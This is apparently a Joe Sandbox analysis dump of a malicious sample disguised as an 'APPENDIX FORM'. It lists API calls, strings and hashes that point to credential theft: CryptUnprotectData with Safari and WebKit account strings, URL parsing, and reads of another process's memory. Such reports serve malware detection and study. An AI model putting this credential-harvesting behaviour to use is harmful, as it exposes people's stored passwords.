• FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
APIs
• RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
• GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• memset.MSVCRT ref: 004095FC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3655998216-0
                                                                                                              • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                              • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                                                                                                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00445426
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                              • String ID:
                                                                                                              • API String ID: 1828521557-0
                                                                                                              • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                              • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                                                                                                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                              • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@FilePointermemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 609303285-0
                                                                                                              • Opcode ID: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                              • Opcode Fuzzy Hash: 56af1d3d616a015a3ecb908bea2399ecc0b12673b9d22b9fdb7fca1b43f88111
                                                                                                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2081463915-0
                                                                                                              • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                              • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                              • String ID:
                                                                                                              • API String ID: 2136311172-0
                                                                                                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 1936579350-0
                                                                                                              • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                              • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                                                                                                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1294909896-0
                                                                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1294909896-0
                                                                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1294909896-0
                                                                                                              • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                              • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                                                                                                              • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                                                                                                              • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                                                                                                              APIs
                                                                                                              • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                              • GetLastError.KERNEL32 ref: 0040995D
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                              • GetLastError.KERNEL32 ref: 00409974
                                                                                                              • CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalLock.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
• GlobalUnlock.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• free.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
APIs
• NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 2929817778-1134094380
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
• API String ID: 2787044678-1921111777
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
                                                                                                              APIs
                                                                                                              • EndDialog.USER32(?,?), ref: 00413221
                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                              • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                              • memset.MSVCRT ref: 00413292
                                                                                                              • memset.MSVCRT ref: 004132B4
                                                                                                              • memset.MSVCRT ref: 004132CD
                                                                                                              • memset.MSVCRT ref: 004132E1
                                                                                                              • memset.MSVCRT ref: 004132FB
                                                                                                              • memset.MSVCRT ref: 00413310
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                              • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                              • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                              • memset.MSVCRT ref: 004133C0
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                              • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                              • wcscpy.MSVCRT ref: 0041341F
                                                                                                              • _snwprintf.MSVCRT ref: 0041348E
                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                              • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                              Strings
                                                                                                              • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                              • {Unknown}, xrefs: 004132A6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                              • API String ID: 4111938811-1819279800
                                                                                                              • Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                              • Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
                                                                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                              • String ID:
                                                                                                              • API String ID: 829165378-0
                                                                                                              • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                              • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00404172
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
